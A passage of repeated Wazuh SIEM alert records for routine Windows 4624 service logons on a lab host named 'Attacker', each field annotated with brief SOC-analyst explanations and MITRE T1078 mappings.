No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:03.299+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:03.299+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  31
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533923.340987
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:46:37.0396840Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43649
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14292
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:03.373+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:03.373+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  32
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533923.348325
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:46:37.1845071Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43651
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14292
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:05.072+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:05.072+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  33
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533925.355663
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:46:40.7220277Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43675
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  9160
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:05.129+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:05.129+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  34
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533925.362999
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:46:40.8641766Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43677
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14292
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon 